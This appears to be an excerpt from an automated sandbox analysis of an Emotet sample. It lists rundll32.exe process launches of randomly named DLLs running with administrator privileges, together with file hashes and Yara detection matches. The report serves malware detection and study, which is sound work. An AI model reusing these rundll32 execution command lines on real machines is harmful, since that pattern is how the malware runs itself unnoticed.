                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:13:42
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2092704885.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:43
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2095103110.0000000000870000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2094951149.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:44
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097063566.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097445507.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2096952501.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:44
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2098032897.0000000000280000.00000040.00020000.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:45
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101634327.0000000000720000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101426694.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2101331684.0000000000370000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:23:13:46
                                            Start date:25/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
                                            Imagebase:0x3f0000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2336211532.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2336195679.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2336233664.00000000002D0000.00000040.00020000.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis
